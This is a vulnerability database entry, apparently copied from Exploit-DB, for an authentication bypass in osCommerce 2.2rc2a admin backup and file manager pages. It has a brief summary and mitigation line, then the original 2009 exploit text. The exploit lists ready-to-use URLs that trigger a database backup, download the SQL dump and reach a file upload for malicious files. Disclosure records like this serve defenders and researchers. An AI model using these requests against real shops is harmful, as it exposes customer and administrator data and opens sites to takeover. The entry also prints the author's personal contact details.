osCommerce online SHop Backup Vulnerability

vendor:

osCommerce online SHop

by:

indoushka

4.3

CVSS

MEDIUM

Backup

532

CWE

Product Name: osCommerce online SHop

Affected Version From: osCommerce online SHop 2.2rc2a

Affected Version To: osCommerce online SHop 2.2rc2a

Patch Exists: NO

Related CWE:

CPE:

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

osCommerce online SHop Backup Vulnerability

An attacker can access the backup of the osCommerce online SHop by accessing the URL http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=backup and http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=backupnow. The attacker can then download the backup by accessing the URL http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=download&file=db_comm-20100301222138.sql. The attacker can also access the backup by accessing the URL http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/file_manager/login.php?action=backup.

Mitigation:

Ensure that the backup files are not accessible to unauthorized users.

Source

Exploit-DB raw data:

========================================================================================             $
| # Title    : osCommerce online SHop Backup Vulnerability                                           $
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   :                                                                         |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # DAte     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : Powered by osCommerce online SHop http://www.oscommerce.com/            |
| # Tested on: windows SP2 Fran&#30902;ais V.(Pnx2 2.0) + Lunix Fran&#30902;ais v.(9.4 Ubuntu)       |
| # Bug      : Backup                                                                  |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=backup

http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=backupnow

to download buckup :http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/backup/login.php?action=download&file=db_comm-20100301222138.sql

db_comm-20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with opera 10.10 + Mozilla Firefox

http://127.0.0.1/oscommerce-2.2rc2a/catalog/admin/file_manager/login.php?action=upload (2 upload ev!l "not finishid")

go to original path 

http://127.0.0.1/oscommerce-2.2rc2a/catalog/
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------